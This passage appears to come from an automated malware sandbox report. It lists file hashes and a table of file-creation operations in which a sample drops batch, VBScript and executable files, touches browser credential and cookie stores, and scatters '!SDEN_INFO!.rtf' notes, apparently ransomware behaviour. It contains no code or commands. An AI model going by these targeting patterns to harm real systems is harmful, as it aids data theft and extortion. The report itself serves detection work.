SHA1: 76aa0c62da71445bc129cccd5533f479248c1d57 SHA256: 313c36f5e0f753d32e46df9689f366029a7569829ad4aa1c5e07cf79eaf2020e SSDeep: 96:lpQbu4VN9dPTS60m3fJgyJV1YhYMzNVaEYOmL/ufRNumUa:l8N9dO60aRJVnMzNVaEcL2fHu |
|
|
| C:\Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx | 69.38 KB |
MD5:
289d5adfb22912128e7b59f3a28961c2
SHA1: 7c95787f05b09b5ae6ad017b7f49d96b5751c684 SHA256: 1496d3099d3e0be402f59f0935e90159e40badc9e8056d78eb8dd5935d957bbb SSDeep: 384:vFO+b9PwjIZQJmDvgRCRczUA+d1v682encWFc5HcuDmAUJKgUFO+b9PpCfHu:vE+bBwj8uJupiA8HcamAUAE+bBmO |
|
|
| C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite | 5.00 MB |
MD5:
57dc0d53b2c3deb0279e05494680f26e
SHA1: 3ebc59b0c4d04e1f8cf5c8a0263e54afe0a57726 SHA256: 07f85ba52c65fefd0b51e6ebc039814ac83c546d812dae37ed400f08991963d0 SSDeep: 3072:aJxzhmWKituSFuAQtiZGudqEDOasFY1rizE:glmUuJAQEZGsRSa4Yn |
|
|
| C:\Users\FD1HVy\Documents\hR6CmyF41D7GurnQ7sOc.xlsx | 24.47 KB |
MD5:
9de0b9d7b1005aa1b52091790ef0fe48
SHA1: e69498f3e396152597249bd860290506d273332f SHA256: 587e4603cbf882e635c190262f1dabbe7752e6bf1c98bcda88a2e43120b98f49 SSDeep: 768:bry4cnuPoyH40LBiUkgwTAGbEfgAksrq0mT6/oO:brRu0BiUeclgAzq0mT6/oO |
|
|
| C:\Users\FD1HVy\Documents\GlzMlE4S.docx | 58.97 KB |
MD5:
341351055fca3739bd35bffa9366a7cc
SHA1: 9e12af1f183c71471dabc0214e86e724d95eef46 SHA256: 7cd85cd1ce2b65711e9fe69d9aa3ecb047460537adc6d8e27060ff24c817f859 SSDeep: 1536:Ljw67HmSq27t0OEUvZ7qWiNYZ/TFJYW73XKiW6i9O:LjTCF2MUvZ+WeYlFuWLXKi7i9 |
|
|
| C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\iSUyvv2-pWLpyw9zJXDb.odt | 47.81 KB |
MD5:
c8810ad94b55b7bb3f336ce6bea4981c
SHA1: d8e90760d0c86d4e3953400a2f54cdd03421397a SHA256: 84d53da2595c39bc176343a583adac2e3877f415b9a4ba71fd56f489911d7d5a SSDeep: 768:PZf183cCc6nVHMD81jBEnep6XWBzZ4zzYBqMybhwo4DTWmBAQN6mKDejqtsoYHGl:Z18jLVsaFEmuzzYBZp+mBdN6p4quHSEo |
|
|
| C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_sv.properties | 4.71 KB |
MD5:
0d0cd91280d0523a7ddea83d2c3fca92
SHA1: eaaf113a8b8bac0e0cd8f72bcac54313981dcb8a SHA256: 021407ca170392f92a659b378ecb0cfca2646d5eff940624314eaae8a82fd7cc SSDeep: 96:aBv27g4JkRvnrt9EBq/Xsxi1MtW6bn2vMzOz66CmL/ufRNumUa:aBWg42pnrtPvsM16b2EzO26vL2fHu |
|
|
| C:\Program Files\Java\jre1.8.0_144\lib\cmm\sRGB.pf | 4.45 KB |
MD5:
0fbfb13f6ab54f7389d3563c7c4ea4fd
SHA1: 6c4384c8ac76f51b1e4169775d57096891556d72 SHA256: b47fc53d9e8bd87b90c22f33e7fb3972bfa9364c1bb79b5de28309f41cb6e3e5 SSDeep: 96:TH/CD9o4Yn9bXjziQx88Xla2gmL/ufRNumUa:TH6D64Y9bXjziQx/XlnL2fHu |
|
|
| C:\Program Files\Java\jre1.8.0_144\lib\management-agent.jar | 1.75 KB |
MD5:
ee387188a2de10d02cadb95ab1f9d767
SHA1: 6c012c6effb58cd0c3b1d3ac88ef3c44ad98eb15 SHA256: 7d1a0677b6d36b4eaff026d61609ab4c862713df0aa7962fca43814e3da963ce SSDeep: 48:HgCmIuHeU/bNmLaPcuB4i+gNiZvuUbHe:HgCmIXemL/ufRNumUa |
|
|
| C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_CopyNoDrop32x32.gif | 1.53 KB |
MD5:
d5b2e483bf036bd28c05483c49d18792
SHA1: 546b659eadf71522940b9bb49c43d35a404501bf SHA256: fd1b6a6a9d36977925086e0bd0f51c6273e6ee6f8ec7f36c9584148fa0ba8549 SSDeep: 24:wGiJwlDk0jjNm1Zau30Xx7lIyHUuBmBVi+giEitjAr/LrIX135kXPlQR5pHjiq:vk0vNmLaPcuB4i+gNiZvuUbHeq |
|
|
| C:\Program Files\Java\jre1.8.0_144\THIRDPARTYLICENSEREADME-JAVAFX.txt | 63.82 KB |
MD5:
05f0b23fd2b2839e481bc054d65f1723
SHA1: c914e4e6df867d53582f7cb4ef1f1eabda137f48 SHA256: 9de251ec04f5e1b413b590e15f07440c707dd913e5df1b14644f4eb09c196d4a SSDeep: 1536:KTOjsjLiIddLsn19Zs6CSTmLNvkuiYLZO:puA1P/yZ8xQZ |
|
|
| C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_pt_BR.properties | 4.59 KB |
MD5:
28cf7f079ffb04d95353f64eedce94db
SHA1: 75ca3d87456bcd22ada3d70ff38e38c93a222d95 SHA256: 871c6237591c1acc7b54f58903cd288a3629d9a46baa377c32dae271dea1787c SSDeep: 96:Z1+9Styon3Rt4WJ6moZT+XGQ+E0ndU2Z5n7HK8TmL/ufRNumUaqg:2EDht4WgmW+XGku5n7H+L2fHu |
|
|
| C:\Program Files\Mozilla Firefox\browser\features\clicktoplay-rollout@mozilla.org.xpi | 7.11 KB |
MD5:
c4f2a7cdc09d20d9fd02f74b2a68e82a
SHA1: f18e67b1db7ca26f236300e30ab7786f140b9c76 SHA256: 453659694af1c47ec84aff3a04bd5856dbbfb95ed603a8c4a7a37019b0a61b6d SSDeep: 192:nyduLscYy/FPVpryumG9UGg5IYAbSNitBrDdeXL2fHu:nyd0scYIVpr3m83gGYiIXCfHu |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | 107.60 KB |
MD5:
ef4fcbbb2b16d170daece5d702b1dbf2
SHA1: 8b0efcaf0d5ba7f7cc19ac46260fa620c6827720 SHA256: f426b6d21ad197200422e31f0ca564fdc3f4d554831b364d0fec5f9d6975639a SSDeep: 1536:r0IfNJRm/lJ8SZyHlZ0ZzQWVAShISqTVjiXPy1c2CVTO:r5f7E/lJ8S8HlM0WViSVR |
|
|
| C:\Users\FD1HVy\Documents\MDvWkEoF\qR4asBdhoH30jOJbDKW.pdf | 43.66 KB |
MD5:
76ca53412d68178861b1d14b1613de5f
SHA1: 0ddc92c8692cd324cc6b2f020a6e65b8fc30aa63 SHA256: 563dd5c2e3227c7359cdb7d488c1fab2baa3cb08274c9246d40a101dd5731878 SSDeep: 768:BaBNCY/Ktzxxu0+0vr8sxloFNqSmwwCDDHzTgNh81BHFsp5q0ayJSgTNO:BmsY6xxK4gC+FN2oHzU0Bo5lxXO |
|
|
| C:\Program Files\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi | 718.03 KB |
MD5:
150c7eced41a589c4a976e4ab9411e8e
SHA1: c6b7b283a8e052164c81b68e94699c2057ea4bbc SHA256: 1676d512fe0ce8a3bfd19b359d2b135ba1036e03d499e8df062c82bd1882f298 SSDeep: 12288:QuHsffXGM7s2A7cdByJhmcDoYZB+mW5pDaayA1bRmnd2fLWh7uAhVsBFO7cRfcRj:c1bRmALWhlsG7cRfcRc |
|
|
| C:\Program Files\Mozilla Firefox\dictionaries\en-US.aff | 4.38 KB |
MD5:
dbad4fbf29d62a9db6ae068c3fec3f38
SHA1: 455f6052f72ffc684ff93baf5cb82eb2b09ab5c0 SHA256: 03a65e5ba1eb153a1844f46f6ffd8473161a2e20b1c36df40c0d51cd3a4ba52e SSDeep: 96:KPY8Olx8DcKWySkwFIW6WJuf2hGmL/ufRNumUa:R3KWylw8OTL2fHu |
|
|
| C:\Logs\Microsoft-Windows-Kernel-PnP%4Configuration.evtx | 1.01 MB |
MD5:
04bd4eba108026d5bca1d147ccdadeca
SHA1: f3e6fe79866d7d96a9714e2674dea3af5c45d942 SHA256: 0ae9fe2987a2c194d2a08f4062e6ff3d5303b6836d0f7a099dfee4a40038cd2f SSDeep: 1536:dwKDIQgeipfEyhFajGyEuH6eQIjuovTJrEyLpZpVwKDIIO:dZDJghmEYvBv1ACp9ZDv |
|
|
| C:\Program Files\Java\jre1.8.0_144\lib\security\cacerts | 113.61 KB |
MD5:
083931d8da28474347d9ca1b2c9ffd0b
SHA1: cd24ed44ef5412d6afac43644ff2f075741f050a SHA256: 3a547e34efe0464f5c58d69eac3740aa0d2326fa4fdf2c0aff924140cbe4128b SSDeep: 1536:+/RJSXTciYLUXlkT1ze0WuQHoeCHtVcwnIhEObD+lyCpjvaoUU5Z0nO:aJSXTuI0Wuybot+wnINbylyCpLm |
|
|
| C:\Program Files\Java\jre1.8.0_144\lib\ext\access-bridge-64.jar | 185.00 KB |
MD5:
a9c5aee93f6a86a1af439bac334252c9
SHA1: 7cabf304f9c8fadb1522c2adfdaa8dd9bcaeaca7 SHA256: 16eb9d0e459cc8dbbc90007395d2a3fd202611c9c3d92aaa36d9a84b1529eeb7 SSDeep: 3072:d+NlOPCQfPI+aYXcd9q8vLEpzmJIHBH0e8koupc/mFwLehRV2f1cPWZXpU:dgOaQfQ+LcjvLczmyHNN2upc+FWt1CWw |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster.jpg | 68.97 KB |
MD5:
71d6a6efe0ecc384f2a8bde834d0573c
SHA1: d758f25d73f8b2c7d236c8b3888611998413ae74 SHA256: 8d6c6a1b3f6520274f1937c584736c582bc8f5c4ab6a4c38e4e1b2bf0c52be93 SSDeep: 1536:L4ORfbOA+kr05HEdH7Cc58pHy5rHynNaHvXa4v3RYmb44444444444444444444F:3BiwTdL7DyNmXBvnX2Wd5twwJU4NM |
|
|
| C:\Program Files\Mozilla Firefox\crashreporter.exe | 188.84 KB |
MD5:
6ee4580ee0106b3a5f305260d600e66d
SHA1: c919e4f84308d576b428da443f2b2122d5f0d96f SHA256: a400e55c4022482f4e988336bbb098dbb5de2085a21beca42081188457a00994 SSDeep: 3072:Y3KR+EKjQXIQDUY5L8d0PWrjaUJyny0v5JjRW+U6+jPPehiy0ZhuW+jUV:MULDgY5Lq9aUJavk+o28Tuw |
|
|
| C:\Program Files\Java\jre1.8.0_144\README.txt | 1.43 KB |
MD5:
7b77cc75949ae595a69cea37b30ea461
SHA1: cf556fc55167f2df3dd4dcae7b5863ac7fa4fff9 SHA256: c20b5e8fe9bb39db82cbdd12f7577418ae18a0b01a6d9e1fa6a367842124506f SSDeep: 24:3NNjNm1Zau30Xx7lIyHUuBmBVi+giEitjAr/LrIX135kXPlQR5pHjit:d1NmLaPcuB4i+gNiZvuUbHet |
|
|
Host Behavior
File (6116)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\ALL_dmp.fldp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\log.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\GJhtEkh2.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\V1nQ8f0P.bat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\eapzhiWZ.vbs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\61.0.3163.79\Installer\chrome.7z | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\Outlook Files\kkcie@kdj.kd.pst | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\irP-_lJVXPj FWZ6iyYJ\Z_PSSxHcDpT\ZBNeq\HRt9zX--uxTxj7rs8.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\Vw9 cNao_kB.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\ivYTDOP.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\q1N9.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\K1x_a5kN_6Xhy9ntGym\PWEP9ZZOb dHlAYjsy\Kw9XQh.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\netfx_Core_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\Windows6.0-KB956250-v6001-x64.msu | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\6HQBe1Id.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\wx1gKcZ ARkXbsEtQ26.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\JXIUqqf 3E1.odt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\AccessCache.accdb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\Database1.accdb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Local\Mozilla\Firefox\Profiles\w7cr0hor.default\OfflineCache\index.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Default\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\irP-_lJVXPj FWZ6iyYJ\Z_PSSxHcDpT\ZBNeq\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\Outlook Files\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\K1x_a5kN_6Xhy9ntGym\PWEP9ZZOb dHlAYjsy\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\ffjcext.zip | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\irP-_lJVXPj FWZ6iyYJ\Z_PSSxHcDpT\zZn5.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\HV67.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\dJ1D8WWJKN0vwRrX.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\irP-_lJVXPj FWZ6iyYJ\xjYLW_hfZv1k8ab.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\qIJWv_cl3Fl.odt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\YFbehrau7-I.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\Xp8i-yDNo1to.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\irP-_lJVXPj FWZ6iyYJ\lO-5UKEm.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\N8Jr-vH1xH.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\yTvQERL.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\lH729p9NvtlORqAu.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
